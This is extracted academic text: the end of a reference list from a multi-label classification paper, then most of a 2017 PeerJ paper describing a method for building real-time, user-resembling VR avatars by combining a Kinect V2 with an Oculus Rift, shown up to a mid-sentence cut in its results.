Ogihara M. 2003. Detecting emotion in music. In: Proceedings of the international symposium on music information retrieval. 239–240. Liang K-Y, Zeger SL. 1986. Longitudinal data analysis using generalized linear models. Biometrika 73(1):13–22. Liu F, Zhang X, Ye Y, Zhao Y, Li Y. 2015. MLRF: multi-label classification through random forest with label-set partition. In: Proceedings of the 11th international conference on intelligent computing. Springer, 407–418. Madjarov G, Kocev D, Gjorgjevikj D, Džeroski S. 2012. An extensive experimental com- parison of methods for multi-label learning. Pattern Recognition 45(9):3084–3104 DOI 10.1016/j.patcog.2012.03.004. Meyer D, Dimitriadou E, Hornik K, Weingessel A, Leisch F. 2014. e1071: misc functions of the department of statistics, TU Wien. Available at http://CRAN.R-project.org/ package=e1071. Platt J. 2000. Probabilistic outputs for support vector machines and comparisons to regularized likelihood methods. In: Smola A, Bartlett P, Schoelkopf B, Schuurmans D, eds. Advances in large margin classifiers. Cambridge: MIT Press, 61–74. R Core Team. 2014. R: a language and environment for statistical computing. Vienna: R Foundation for Statistical Computing. Available at http://www.R-project.org/ . Read J, Pfahringer B, Holmes G. 2008. Multi-label classification using ensembles of pruned sets. In: Proceedings of the 8th IEEE international conference on data mining. 995–1000 DOI 10.1109/ICDM.2008.74. Read J, Pfahringer B, Holmes G, Frank E. 2011. Classifier chains for multi-label classification. Machine Learning 85(3):333–359 DOI 10.1007/s10994-011-5256-5. Schapire RE, Singer Y. 1999. Improved boosting algorithms using confidence-rated predictions. Machine Learning 37(3):297–336 DOI 10.1023/A:1007614523901. Schapire RE, Singer Y. 2000. BoosTexter: a boosting-based system for text categorization. Machine Learning 39(2):135–168 DOI 10.1023/A:1007649029923. Srivastava A, Zane-Ulman B. 2005. Discovering recurring anomalies in text reports regarding complex space systems. In: Proceedings of the 2005 IEEE Aerospace Conference. 3853–3862 DOI 10.1109/AERO.2005.1559692. Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 19/20 https://peerj.com http://dx.doi.org/10.1145/1401890.1401939 http://dx.doi.org/10.1007/978-3-540-30115-8_22 http://dx.doi.org/10.1016/j.patcog.2012.03.004 http://CRAN.R-project.org/package=e1071 http://CRAN.R-project.org/package=e1071 http://www.R-project.org/ http://dx.doi.org/10.1109/ICDM.2008.74 http://dx.doi.org/10.1007/s10994-011-5256-5 http://dx.doi.org/10.1023/A:1007614523901 http://dx.doi.org/10.1023/A:1007649029923 http://dx.doi.org/10.1109/AERO.2005.1559692 http://dx.doi.org/10.7717/peerj-cs.242 Tai F, Lin H-T. 2012. Multilabel classification with principal label space transformation. Neural Computation 24(9):2508–2542 DOI 10.1162/NECO_a_00320. Trohidis K, Tsoumakas G, Kalliris G, Vlahavas I. 2008. Multilabel classification of music into emotions. In: Proceedings of the 9th international conference on music information retrieval. Philadelphia, 325–330. Tsoumakas G, Katakis I. 2007. Multi-label classification: an overview. International Journal of Data Warehousing and Mining 3:1–13. Tsoumakas G, Katakis I, Vlahavas I. 2008. Effective and efficient multilabel classification in domains with large number of labels. In: Proceedings of ECML/PKDD workshop on mining multidimensional data. 30–44. Tsoumakas G, Katakis I, Vlahavas I. 2010. Mining Multi-label Data. In: Maimon O, Rokach L, eds. Data mining and knowledge discovery handbook. Boston: Springer, 667–685. Tsoumakas G, Katakis I, Vlahavas I. 2011. Random k-Labelsets for multilabel classi- fication. IEEE Transactions on Knowledge and Data Engineering 23(7):1079–1089 DOI 10.1109/TKDE.2010.164. Tsoumakas G, Vlahavas I. 2007. Random k-labelsets: an ensemble method for multilabel classification. In: Proceedings of the 18th European conference on machine learning. Berlin: Springer, 406–417 DOI 10.1007/978-3-540-74958-5_38. Vapnik VN. 2000. The nature of statistical learning theory. 2nd edition. New York: Springer. Wilcoxon F. 1945. Individual comparisons by ranking methods. Biometrics Bulletin 1(6):80–83 DOI 10.2307/3001968. Ypma TJ. 1995. Historical development of the Newton-Raphson method. SIAM Review 37(4):531–551 DOI 10.1137/1037125. Zhang M-L, Zhou Z-H. 2005. A k-nearest neighbor based algorithm for multi-label classification. In: Proceedings of the 1st IEEE international conference on granular computing, vol. 2. 718–721 DOI 10.1109/GRC.2005.1547385. Zhang M-L, Zhou Z-H. 2007. ML-KNN: a lazy learning approach to multi-label learning. Pattern Recognition 40(7):2038–2048 DOI 10.1016/j.patcog.2006.12.019. Zhang ML, Zhou ZH. 2014. A review on multi-label learning algorithms. IEEE Transac- tions on Knowledge and Data Engineering 26(8):1819–1837 DOI 10.1109/TKDE.2013.39. Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 20/20 https://peerj.com http://dx.doi.org/10.1162/NECO_a_00320 http://dx.doi.org/10.1109/TKDE.2010.164 http://dx.doi.org/10.1007/978-3-540-74958-5_38 http://dx.doi.org/10.2307/3001968 http://dx.doi.org/10.1137/1037125 http://dx.doi.org/10.1109/GRC.2005.1547385 http://dx.doi.org/10.1016/j.patcog.2006.12.019 http://dx.doi.org/10.1109/TKDE.2013.39 http://dx.doi.org/10.7717/peerj-cs.242 work_qvfmvqialfhorlcowa3mhbljue ---- Submitted 28 February 2017 Accepted 4 July 2017 Published 24 July 2017 Corresponding author Renan C. Moioli, moioli@isd.org.br Academic editor Alex James Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.128 Copyright 2017 Macedo Silva and Moioli Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A method for creating interactive, user- resembling avatars Igor Macedo Silva1,2 and Renan C. Moioli2 1 Centro de Tecnologia, Universidade Federal do Rio Grande do Norte, Natal, Rio Grande do Norte, Brazil 2 Graduate Program in Neuroengineering, Edmond and Lily Safra International Institute of Neuroscience, Santos Dumont Institute, Macaiba, Rio Grande do Norte, Brazil ABSTRACT Virtual reality (VR) applications have disseminated throughout several fields, with a special quest for immersion. The avatar is one of the key constituents of immersive applications, and avatar resemblance can provoke diverse emotional responses from the user. Yet a lot a virtual reality systems struggle to implement real life-like avatars. In this work, we propose a novel method for creating interactive, user-resembling avatars using available commercial hardware and software. Avatar visualization is possible with a point-cloud or a contiguous polygon surface, and avatar interactions with the virtual scenario happens through a body joint-approximation for contact. In addition, the implementation could be easily extended to other systems and its modular architecture admits improvement both on visualization and physical interactions. The code is under Apache License 2.0 and is freely available as Supplemental Information 1 in this article. Subjects Human-Computer Interaction, Emerging Technologies Keywords Virtual reality, Immersion, Oculus rift, Kinect, Avatar embodiment INTRODUCTION Virtual reality (VR) is understood as an advanced human–computer user interface that mimics a realistic environment by linking human perception systems with a virtual environment (Zheng, Chan & Gibson, 1998). The key point about VR is its attempt to provide seamless interaction with a computational environment, thus understanding human intent and creating a reasonable response from the virtual environment. The gaming industry has historically driven developments on VR (Mills, 1996), contributing to lowering the cost of technology. There has been a growing demand for techniques or devices that improve the user’s ability to feel inside a game, surrounded by elements that promote the desired gameplay. To achieve that, the industry has turned to motion tracking devices and immersive 3D graphics, including head mounted displays (HMDs), such as Oculus Rift, HTC Vive, and Hololens, and motion tracking technologies, such as Kinect, Wii Remote, Leap Motion, and Virtuix Omni VR treadmill. This recent surge of affordable VR devices expanded the number of VR applications. To mention but a few examples beyond the gaming scene, VR is now widely used in medical applications for physical rehabilitation (Paolini et al., 2013; Baldominos, Saez & Del Pozo, 2015; Draganov & Boumbarov, 2015; Morel et al., 2015; Donati et al., 2016; Shokur et al., 2016), exposure therapy for phobias and post-traumatic stress (Notzon et al., 2015; How to cite this article Macedo Silva and Moioli (2017), A method for creating interactive, user-resembling avatars. PeerJ Comput. Sci. 3:e128; DOI 10.7717/peerj-cs.128 https://peerj.com mailto:moioli@isd.org.br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.128 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.128#supp-1 http://dx.doi.org/10.7717/peerj-cs.128 Cuperus et al., 2016), treatment for addiction (Park et al., 2016) and even autism (Didehbani et al., 2016). Other fields such as architecture and urban planning (Portman, Natapov & Fisher-Gewirtzman, 2015; Luigi et al., 2015) and education (Abulrub, Attridge & Williams, 2011) also benefit from the technology. However, as advanced as those technologies are, there are a few limitations to each of them. The technologies mentioned above, such as the HMDs and motion tracking devices, tackle a single piece of the virtual reality interaction problem. The HMDs give visual support for the simulation while motion tracking devices provide means for our body to interact with the virtual world. On one hand, most HMDs deal exclusively with visual perceptions and head movement while completely ignoring any other body movement. As a result, HMDs applications are usually static and display static, generic avatars, frustrating any kind of user interaction other than through vision and head movement. Motion tracking devices, on the other hand, allow for whole-body user interaction but limit the immersion experience because they do not take into account the user’s visual field. Therefore, users are limited on how they can interact with the system, depending on which device they use. A possible solution is to use the capabilities of both devices in an integrated hardware- software approach. Ideally, this system would be able to track body movements, record user images and present them inside the head mounted display, reacting to what the user is looking at and how the user is moving. A key issue is that there is scarce information on how to integrate and utilize both technologies in one whole system. An example is shown by Woodard & Sukittanon (2015), explaining how both Oculus Rift and Kinect could be used to create virtual interactive walkthroughs for building projects. However, they do not use the Kinect’s full capabilities, such as body-frame detection and RGBA frames to recreate the avatar and interact with the virtual environment. In accordance with growing evidence of the importance of avatar representation and interaction to obtain an improved immersion experience in virtual reality, this work presents a software approach to integrate a motion tracking device with depth sensing capabilities (Kinect V2) to a head mounted display (Oculus Rift DK2) in order to improve the interaction and immersion perception in VR systems. This software uses the SDKs of both devices, along with OpenGL for rendering graphics and Bullet Physics for physic simulations, to create a highly resembling 3D representation of the user in the virtual space. This 3D representation, henceforth referred to as avatar, is highly sensitive to the user’s movements and can interact with virtual objects in the virtual environment. The main result is a demo project that incorporates all of the necessary code to compile a neutral virtual environment with objects and the avatar. The code is under Apache License 2.0 and is freely available as supplementary material. We believe that this work contributes to easily integrate HMDs and motion tracking devices to expand real time immersive experience interaction. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 2/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 BACKGROUND AND RELATED WORK Virtual reality technologies Among the devices used on VR research, the Oculus Rift and the Kinect are probably the most widely known products. Both devices tackle specific problems underlying human– computer interfaces and, by the time of their launch, they brought innovative solutions to the common consumer. Nowadays, there are a few other solutions that aim at offering the same range of features and usability of Oculus Rift and Kinect. Regarding depth cameras, such as the Kinect, we can cite the Asus Xtion, DepthSense 525 Camera, and LeapMotion as alternatives. Although LeapMotion is the most accurate in comparison to the others, with spatial resolution of about 1 mm (Weichert et al., 2013), it has the shortest range of action of 0.6 m (LeapMotion, 2017). Another device called the DepthSense 525 Camera is able to provide 60 fps and depth ranging from 15 cm to 1 m, but its frames per second throughput diminishes quickly as the depth range increases, going from 2.5 m at 15 fps to 4 m at 6 fps (DepthSense, 2017). The Asus Xtion has a similar precision to the Kinect V1, as shown in Gonzalez-Jorge et al. (2013), and its most recent version is comparable to the Kinect V2 in terms of technical specifications (ASUS, 2017; Microsoft, 2017b). Yet the Kinect has a much broader community and support from Microsoft for its official SDK. This reflects specially in the number of applications and publications made with Kinect or Asus Xtion. Thus, considering the specifications shown here, we choose to use in our system the Kinect V2 as the main interface for depth sensing. The first to appear on the market was the Kinect v1, in 2010, with the official software development kit (SDK) released later on in 2011 (Microsoft, 2017a). In 2014, a second iteration of the Kinect was released (Microsoft, 2017b). The Kinect V2 has a 1,080 p color camera operating at 30 Hz in good light conditions, a 512 × 424 depth sensing camera operating at 30 Hz and 70×60 field of view, sensing from 0.5 to 4.5 m, and active infrared capabilities with the same resolution. With its pose tracking capabilities and affordability, the Kinect quickly made its way to the research scene. Regarding accuracy for motion tracking, the Kinect is adequate for most scientific purposes, including medical studies on posture and rehabilitation (Clark et al., 2012; Clark et al., 2015; Zhao et al., 2014). In particular, Otte et al. (2016) have shown that the Kinect V2 can derive clinical motion parameters with comparable performance to that obtained by a gold standard motion capture system. As for virtual reality headset, the Oculus Rift was for a period the only option available. But, soon enough, companies started to unveil similar products and nowadays the Oculus Rift has a few competitors. Some of them have yet to be commercially launched, such as the Fove and Star VR. Two commercially available platforms are the Playstation VR and the HTC Vive. Both have very similar hardware specifications to the Oculus Rift (Playstation, 2017; DigitalTrends, 2017). The main difference is the price range: while the HTC Vive is priced at U$ 799, the Playstation VR costs U$ 386 and the Oculus Rift is sold for U$ 499. Yet, the Oculus Rift has been in development since 2012 and has created a solid developer Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 3/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 community. For this reason, the Oculus Rift is a sensible choice both in terms of hardware specifications and development support. The first release of the Oculus Rift, named DK1, was for supporters only and occurred in 2012. The second iteration was released in 2014 as DK2, and the first commercial version was released in 2016. The Oculus Rift DK2 improved the first iteration with a screen resolution of 960 × 1,080 p per eye, a refresh rate of 75 Hz and persistence of about 2 to 3 ms. In addition, the head-mounted display has sensors to detect head motion both internally and externally. The immersion requirement If we understand VR as a human–computer interface, there are two core ideas that measure the quality of the interface: immersion and interactivity (Zheng, Chan & Gibson, 1998). Immersion occurs when the user is able to block out distractions, usually any perceptions from the real world, and then focus on the virtual elements with which one wants to work. Interactivity is the possibility to interact with the events of the virtual world. Both ideas are connected and interdependent. For example, if a VR system has low interactivity, the immersion factor might be affected. On the other hand, if the system is not immersive, the interactivity will be less engaging. The immersion requirement dictates the overall experience with a VR system. A previous study developed by Alshaer, Regenbrecht & O’Hare (2017) identified three immersion factors which affect perception and the sense of self-presence in a VR system: the display type (head mounted display (HMD) or monitor), field of view (FOV) and the user’s avatar. A poor tuning of these factors can cause discomfort and a sense that the virtual actions or events are absurd and do not reflect reality among users, eventually disrupting the immersive experience and causing a poor VR experience as a whole. Avatar embodiment In VR systems, the avatar consists of a visual representation of the user, a construction made to visually communicate aspects of one’s identity and how he or she wants to be perceived. Using the avatar, the user is able to give meaning to their virtual self and that correlates with the sense of presence (De França & Soares, 2015). The concept of presence, as mentioned by De França & Soares (2015), allows a discussion about self representations at three different, yet interdependent levels: body, affection and identity. Focusing on those three levels is specially important in VR applications in order to improve the user’s performance in the system. In the discussion section, we present how the developed system exploits those levels in order to create sense of embodiment. This connection between avatar and physical self has been investigated. Wrzesien et al. (2015) focused on how teenagers can learn to regulate their emotions by watching physically similar avatars deal with frustration. The authors concluded that when the avatar is modeled to resemble the human user, the intensity of the emotional states, emotional valence and arousal for each participant has a much greater level than that obtained when the avatar is neutral. This confirms that the similarity between the avatar and the user may cause a significant psychological response. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 Another study (Fox & Bailenson, 2009) was concerned about how this similarity might modify behavior. After dividing the participants in groups with a virtual self representation or with another person representation, they were exposed to voluntary sessions of exercises with rewards and punishments. The research concluded that the group with virtual self representation exercised significantly more regardless of reward or punishment. Both studies demonstrate that the avatar influences the overall experience on VR and expands this experience to the user in the physical world. Similar results were obtained in a study by Lugrin, Landeck & Latoschik (2015), confirming that behavior and performance are indeed altered by avatar representation. Applications The avatar is a core concept for immersion in VR (Alshaer, Regenbrecht & O’Hare, 2017), thus most VR applications benefit from improved user-resemblance and interactivity with the virtual environment. In the medical field, VR is broadly used for rehabilitation treatments. For example, the systems presented by Rudinskiy et al. (2014), Donati et al. (2016) or Shokur et al. (2016) use VR with an avatar visualization for gait rehabilitation. In this case, an improved avatar visualization would help generating a better sense of immersion and could possibly help with the treatment. This improvement is thought to come from an increased engagement in the rehabilitation activities, which provokes intense and life-like emotions and behaviors. This motivates the user to perform the activities. Another field that benefits from this technology is social studies. In a controlled environment, such as a virtual environment, it is possible to reproduce a variety of social phenomenons. A highly user-resembling avatar may improve the immersion experience and mimic social interactions. For example, Stavroulia et al. (2016) creates a simulated environment to reproduce bullying occurrences inside a classroom. Considering the benefits of an avatar representation, it is expected that such a simulation would benefit from the avatar generation method described here by improving on the overall experience of the system. As a last example, tourism or even architecture could benefit from this technology by giving the user an immersive experience in which they could feel immersed. It is probably easier to create a sense of space and dimensions if you can refer to your own body as a reference. In this sense, interior design professionals and students could use our method to showcase a project and literally place the observer inside the space to visually comprehend each detail of the project. In tourism, virtual environments can replicate interesting places and allow the user to see and even interact with elements through its own avatar. MATERIALS & METHODS Hardware and development environment preparation Hardware integration from different manufacturers is a key point in VR applications and may increase software development complexity. The Oculus Rift DK2 was chosen for visualization and the Kinect for Windows V2 was chosen for motion tracking, color and depth sensing. This choice considered that both Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 5/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 1This is the highest OpenMP version available for Visual C++ in Visual Studio 2013. Table 1 Compatibility requirements for development environment and software usage. System rel- evant information: Windows 10 Pro; AMD Radeon HD 7800 Series; Intel(R) Core(TM) i7-3770 CPU @ 3.40 GHz; 24 GB RAM. Identification Compatibility requirement description C1 The Kinect for Windows V2 requires Windows 8 or higher. C2 The Kinect for Windows V2 requires Kinect for Windows SDK 2.0. C3 The Oculus Rift DK2 on Windows 10 requires Oculus Runtime and SDK 0.7 or higher. C4 The Oculus Runtime 0.8 running alongside an AMD Radeon HD 7800 re- quires AMD Catalyst 15.11.1 beta driver* Notes. *Later versions of the new Crimson Driver were found to be incompatible with Oculus Runtime 0.8. devices were the latest iteration available at their respective product lines by the time this study was developed and, thus, had significant improvements over previous iterations. Specifically, the Oculus Rift DK2 has a higher screen resolution and better head movement tracking than the DK1, which contributes to an improved and seamless visual interaction with the virtual environment. This choice of hardware requires a specific setup of the development environment and later usage of the software because there are potential compatibility issues with operational system, hardware runtime routines, graphic card drivers and available SDKs for each device. A list of requirements for compatibility is available in Table 1 along with relevant information from the system. When multiple versions of software were possible, we opted for the most recent. The language of development is C++ for it was the only language officially supported by both Oculus Rift and Kinect SDKs. Both SDKs can be obtained through their respective product websites, along with correct versions of drivers and runtimes (shown in Table 1) which are necessary for hardware functioning. In addition to SDKs, drivers and runtimes, we used a few libraries: the OpenGL library is already integrated to the Oculus SDK and sample programs; the Bullet Engine 2.83.7 is responsible for physics simulation in the virtual environment, specially collisions between the avatar and virtual objects; and the OpenMP 2.01 is used for parallelization in the handle classes for each SDK. The code was implemented and compiled with Visual Studio 2013. Software requirements The requirements listed in Table 2 guided software development. Other functions (only feasible for the chosen hardware) were implemented along the development in order to provide more interaction options to the user and will be described later. Regarding requirement R1.1, the decision to create the avatar based on real time data is crucial to the final objective of the software, which is to create a deeper sense of immersion in the user. This requirement should enforce the avatar to morph and move accordingly to each user in real time and provide plausible responses to each of their actions in the virtual environment. Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 6/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 2The camera space is a three-dimensional space that represents the position of each point in the real world ‘‘space’’. Table 2 Basic Requirements for the development of the software. Identification Requirement description R1 The software shall create a 3D recreation of the user—known as the avatar. R1.1 The avatar shall be defined by real time data from the depth and color sensors. R1.2 The avatar shall be displayed in a 3D virtual environment in a HMD. R2 The software shall offer the option to visualize in first-person perspective or third-person perspective. R3 The software shall render at an acceptable frame rate (minimum 24 fps). R4 The software shall provide simulated physical interaction between the avatar and the environment. R5 The software shall provide a keyboard interface to select which user has the Oculus Rift point of view, when first-person perspective is selected. R6 The software shall provide a keyboard interface to adjust the camera position in order to accommodate and match the user virtual visualization with the real world. Implementation of core functionality The development of the main idea of the software, described by requirement R1.1 in Table 2, involves the concept of a point cloud (Linsen, 2001; Rusu & Cousins, 2011). This element is composed by a group of points fully defined by their location in a 3D space with magnitude on each of the three space dimensions. Such property allows the programmer to plot this point cloud in a 3D virtual environment and visualize the surface from which the point cloud was acquired in the first place. When visualizing the point cloud, it is possible to perceive the dots as a ‘‘cloud’’ floating in the virtual space, hence the name. If not computationally generated, one can acquire a point cloud from the real world with a depth sensor, laser scanner data or photogrammetric image measurements (Remondino, 2003). For this purpose, this paper uses the Kinect V2, which provides features beyond depth sensing that will be discussed later. The rationale is that it is possible to create a polygon surface from the point cloud of one user. Therefore, the first step was to acquire the point cloud and plot it in the virtual environment, with the aid of the OpenGL library. Using the Kinect SDK, we developed a handle class to request data from the Kinect and translate it to an OpenGL compatible format. The Kinect V2 can simultaneously detect and differentiate up to six users, also called bodies. In addition, the Kinect provides five types of pertinent data for this project: 1. Color Frame: a RGB frame with 1,920 × 1,080 p. 2. Depth Frame: a depth frame with 512 × 424 p. 3. Body Frame: a 512×424 frame where each element contains the index of the detected body for the relative pixel in the depth frame. 4. Joint Vertices: a float array containing information for the camera space2 localization of each joint of each body. 5. Body Array: indicates which of the six possible bodies the Kinect is currently tracking The acquisition of each type of data is executed by a function inside the Kinect Handler class and parallelized with the OpenMP library for optimization. Figure 1 shows the function GetColorDepthAndBody() called from the handle class, which returns the frame Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 7/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 main.cpp Frame rendering roomScene->Render(...); Win32_GLAppUtil.cpp Struct Scene dotsTest->updatePoints(); dotsTest->display(...); Update Avatar points from Kinect Struct MyDots kinect->GetColorDepthAndBody(...); Get data from Kinect Handler kinect->m_pCoordinateMapper-> MapDepthPointToColorSpace(...); kinect->m_pCoordinateMapper-> MapDepthPointToCameraSpace(...); Convert data to Virtual Space glBufferData(...); Upload do OpenGL bufferDraw Avatar graphics and update Collision Objects rigidBodyArray[...]-> getMotionState()->getWorldTransform(...); rigidBodyArray[...]-> getMotionState()->setWorldTransform(...); Update joints' positions glDrawArrays(...); Draw to OpenGL frame boxModels[i]->boxRigidBody-> getMotionState()->getWorldTransform(...); Update positions and Draw graphics from other models boxModels[i]->Render(...); (...) Figure 1 Frame Rendering Cycle: structures and functions. Figure 2 Dataflow and processing. data from the kinect. In Fig. 2, it it possible to observe this same process with a higher level of abstraction, where the handle class acquires the kinect frame data and returns it to the next structure for processing. Next, the depth information from the depth frame is mapped to camera space in order to create the aforementioned point cloud, as shown in Fig. 2. This means that each pixel in the depth frame is mapped to a 3D virtual representation of the real world, so that the software is able to plot a visualization for the point cloud. Alongside, it is also needed to map the depth frame to the color information from the color frame so that the software is able to associate RGB color to each point in the depth frame and render an improved visualization in the Oculus Rift. The Kinect SDK provides both mapping functions and they are used accordingly in the software. The function to map depth frame to camera Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 8/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 space is declared as MapDepthPointToCameraSpace in the ICoordinateMapper struct. It receives a depth space point and a depth value and returns by reference the camera space point. The function to map the depth frame points to color frame points is declared as MapDepthPointToColorSpace. Similarly, it receives a depth space point and a depth value and returns by reference a color space point. With those two conversions, the software is able to place each point in a 3D space and associate RGB color to each point, creating the point cloud. Those function are presented in the frame rendering cycle, in Fig. 1 The next processing stage in Fig. 2 updates the point cloud data to their respective OpenGL buffers and to the Bullet Engine objects in order to create the point cloud graphic visualization and simulate interactions between the point cloud and the virtual environment. Figure 1 shows the order in which those structures and functions are activated in order to render a frame. This simulation is further discussed below. The whole virtual environment is graphically displayed as a rectangular room. In this room, there is a green block and a colored ball within the user’s field of action, i.e., objects with which the user’s avatar can interact. However, this interaction can only happen through a physical contact which is simulated by the Bullet Engine. For this to happen, each object, such as the green block, the colored ball and even the walls of the room have to be represented as geometrical shapes inside the Bullet Engine, otherwise those elements would stay still or move in the room without ever noticing any contact with other objects, percolating through each other as if they did not exist. The Bullet Engine, as any other physics engine, has to predict the final rectangular and angular position of an object, given its initial position and velocity and using the geometrical representation of each object. This is how the physics simulation occurs and without it there could be no interaction whatsoever between the avatar and the virtual space and objects. Assuming that user contact interactions happen mostly near joints like wrist, ankles, knees or elbows for example, it is sensible to consider that approximately any useful contact interaction happens through joints. The Kinect V2 provides 25 joints for tracking and all of them are used in the software implementation. In the Bullet Engine, each avatar joint (dealt with as if it were a point in camera space) becomes a small sphere, specifically a kinematic rigid body type (Coumans, 2015), capable of colliding with other objects, but not having its position altered by them. This representation is what allows the user to interact with other objects in the virtual room. Each joint has a position that is dictated solely by the user and, when each frame is being rendered, this joint position is given to their respective kinematic spheres. This implementation allows for real time tracking and modification of each joint’s position in the physics simulation and leaves the task of calculating velocity, acceleration, momentum and other variables of the objects to the physics engine. After every joint position is updated, the software advances one step with the simulation. If any object such as the green block or the sphere is moving or collides with other objects or with an avatar joint, the physics engine updates their position, rotation and other variables accordingly. This information is also sent to their respective OpenGL buffers, and now OpenGL is ready to render a new frame. The final step is to get the motion data from the Oculus Rift as shown in Fig. 2. This action is needed to properly link the head motion with the OpenGL, so that there is a Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 9/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 correspondence for the HMD position and angles with what can be seen in the OpenGL virtual environment. In the end, the software sends the frame to the Oculus Rift. Figure 1 shows the roomScene struct calling the Render() function in order to finish the rendering cycle and display the final image in the Oculus Rift. This method is novel in the way it uses several Kinect and Oculus Rift features integrated with graphical elements and physics simulations. As pointed out in the Introduction, there are few publications that tackle this integrated approach between HMDs and motion tracking devices (Woodard & Sukittanon, 2015; Baldominos, Saez & Del Pozo, 2015; Stavroulia et al., 2016), yet none of them developed a live avatar, with skeleton tracking and environment interactivity such as touching and pushing. Functionality and performance assessment We conducted a comprehensive set of experiments to evaluate the functionality and performance of the method. First, we analyze the core aspects of avatar visualization with point cloud and polygon surface. The focus is on user experience and visualization perspectives. Rendering performance issues and limitations are assessed with the Fraps tool (Beepa Pty Ltd., Albert Park, Victoria, Canada), which provides the frame rate measurement. We also investigate the interactivity experience with respect to physical collisions of virtual objects with the avatar. We then proceed with three tasks that are able to further evidence the properties of the system. For that, 2 participants were recruited: one who is experienced in interacting with virtual reality environments, and the other who is naive to usage of this technology. Both participants signed the informed consent forms (The Brazilian National Committee of Ethics in Research—CONEP- Ethics Committee protocol number: IRB 1.610.260). In the first task, we evaluate whether the user avatar is capable of tracking the trajectory of a virtual object performing a 1-dimensional sinusoidal motion. Participants are seated in a comfortable chair and asked to wear the Oculus Rift HMD. After a fine adjustment of head and body position, the participant sees their arms (point cloud) and a small red virtual block. The block starts a 1-dimensional sinusoidal trajectory (0.015 rad/frame update), and the participant has to use their hand to follow the same trajectory as that from the block. Performance is evaluated by the coefficient of determination (R2) between the user and the block trajectory. In the second task, we evaluate whether the system provides a realistic interaction experience, i.e., if the actions performed by the participant are correctly captured by the Kinect sensor and displayed as a point cloud avatar that is able to interact with virtual 3D objects. To accomplish that, participants are asked to jiggle a green block from left to right for as long as they can, making sure that it does not fall. Performance is assessed by the number of successful jiggles. In the third and last task, we investigate if our Oculus plus Kinect method performance is similar to that from other systems in terms of trajectory tracking and mismatches between the virtual and real world integration. In this task, the participant is positioned in front of a table, located between six pillars (Fig. 3A). The Kinect is placed at≈1.5 m in front of the table, and six precision motion capture infrared cameras (OptiTrack s250e, NaturalPoint Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 10/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 Figure 3 Third task setup: (A) Block reaching task. In each trial, the participant places their right hand to the side of the rightmost line and then moves until reaching the black block. Six precision motion capture cameras are attached one to each pillar. The user wears the Oculus Rift HMD and the Kinect is positioned in front of the table. Three task stages (B) as captured by the Oculus plus Kinect (C) and Op- tiTrack (D) systems. Inc.) are attached to the pillars (one to each pillar). On the table, we mark two lines (53 cm apart) and place a black block right to the side of the leftmost line. Then, one participant is asked to position their hand next to the rightmost line and move toward reaching the black block (Fig. 3B). The procedure is repeated for 120 s. Using reflective markers and the IR cameras, we are able to accurately measure the participant’s hand and the block spatial coordinates, as well as detect when the hand crosses either of the lines. During the task, the participant is wearing the Oculus Rift and sees a corresponding virtual scenario (table and block), together with a point-cloud visualization of the right hand. In this way, we can compare the hand trajectory captured by the Oculus plus Kinect system with that captured by the OptiTrack system. Also, we can determine if there are any mismatches between the physical and real world by looking at the spatial coordinates over time of each task element. RESULTS A Method for Creating a user-resembling avatar The software implementation of the described method results in a demonstration capable of creating and rendering a real-time avatar representation of the user. The implementation is written based on the samples provided by the Oculus Rift SDK, keeping the code elements that deal with the Oculus Rift communication and adding the code elements that communicate with the Kinect handler class, generate the avatar for the OpenGL library and execute the physics simulation for the Bullet Engine. Using the pointcloud approach allows the software to implement two types of avatar: a pointcloud-based avatar and a polygon-based avatar. The first type is shown in Fig. 4. The software creates a pointcloud using the camera space points that the Kinect provides. Each camera space point becomes a point inside the OpenGL virtual environment with Macedo Silva and Moioli (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.128 11/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.128 Figure 4 Avatar visualization with point cloud. This figure represents both left and right frames pro- jected through the Oculus Rift lenses. The point-cloud avatar is seen in third-person perspective with a striped look, which is a consequence of the alignment of the point cloud and the position in which the frame was captured in 3D space. The red dots in the body indicate joint points provided by the Kinect and that are used for collisions. properties of three-dimensional space and RGB color. The other type of avatar uses the camera points to create polygons where each vertex is a point in the three-dimensional space as show in Fig. 5. As a result, this implementation produces a sense of continuity in the avatar’s body representation, only at the expense of knurled edges. In addition, the software allows the user to see the virtual environment in first-person perspective. This feature is specially important for the immersion factor in our integrated hardware-software approach. The correct head location is obtained with the head position tracking provided by the Kinect SDK while the head rotation and angle is handled by the Oculus SDK. This coordination of features provides a solid recreation of the user’s field of view while they walk around the physical environment. The only limitation is the Kinect field of view and the length of the Oculus Rift cable. In addition, the software allows for a fine adjustment on the head position with the arrow keys or the ‘‘a’’, ‘‘w’’, ‘‘d’’, ‘‘s’’ keys in the keyboard. The Kinect also provides support for the recognition of up to six users and the software implements this feature. Every person in front of the 